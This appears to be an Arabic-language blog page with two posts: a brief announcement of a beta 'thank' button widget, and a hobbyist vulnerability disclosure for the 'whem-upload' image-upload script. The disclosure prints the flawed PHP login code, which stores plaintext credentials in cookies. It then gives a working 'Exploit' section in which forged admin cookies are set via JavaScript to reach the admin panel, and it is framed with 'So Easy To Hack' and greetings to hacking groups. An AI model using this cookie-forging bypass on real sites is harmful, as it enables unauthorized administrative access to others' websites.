“Thank” project_Beta Version_.

اليوم خلصت مشروع صغير عبارة عن زر أو صورة بتكبس عليها من اي موقع بتقوم بترسل Ajax request للموقع تبعي محملة بال url تبع الموقع لي فاتحه ثم يحفظ في قاعدة البيانات تبعي_لا حدا يلومني على الاستضافة تبعي لأنالو مجانية_. المهم في كود بسيط هو: in head tag:

in body:

الصفحة تبعه التجريبة:
http://adnanonline.co.cc/thank
صفحة استعراض عدد مرات الشكر:
http://adnanonline.co.cc/thank/get.php
هدف السكربت:صورة توضع في التدوينة أو وين ماكان بينكبس عليها من أجل شكر الكاتب ثم يذهب إلى صفحة الاستعراض ليعرف كم مرة شكر فيها.
السكربت نسخته تجريبية و في شغلات لح زبطها متل مشكلة العناين المختلفة.
على كل حال خبروني بكل المشاكل يلي واجهتوها و الأخطاء.
سلام.
Test:

Thank widget box . thank tools , thank code.

whem-upload Insecure Cookie Handling Vulnerability.

كنت عم دور على سكربت لرفع الصور.

وجدت whem-upload

نزلته و جدت مشكلة فيه و انا عم حلها اكتشفت فيه ثغرة
و هي اول مرة بحياتي بلاقي ثغرة بسكربت

ارجو من الكل ان لا ستخدمها في إيذاء المواقع الاخرى.

انا مالي مسؤول عن اي ضرر بصيب المواقع من جراء كشفي للثغرة.

بعتت رسالة لصاحب السكربت وحيد ومارد الحق عليه إذا صار شي.بتمنى من الكل أنو ما يستخدموها لاختراق المواقع

النقل مسموح مع ذكر المصدر.

////////////////////////////////////////////////////////////////////////////

---------------------------
wehm-up 1.0 I.Cookie Hand.
---------------------------
Author: Adnan ( zizo.h)
Email: a-homssi@scs-net.org
Download: up
---------------------------
Bug In: \login.php

$user = $_POST['user'];
$pass = $_POST['pass'];
if ($user == “$mem_user” and $pass == “$mem_pass”){
setcookie(“mem_user”, “$user”, time() + 1000);
setcookie(“mem_pass”, “$pass”, time() + 1000);

Exploit:
login:
admin/login.php
javascript:document.cookie = "whem_Name=admin; path=/";
javascript:document.cookie = "whem_Password=admin; path=/";

then \admin\index.php # So Easy To Hack  

Greetz:All No_Hack Members,Sniper-Sa;
///////////////////////////////////////////////////////////
لأي استفسار الرجاء مراسلتي.
سلام.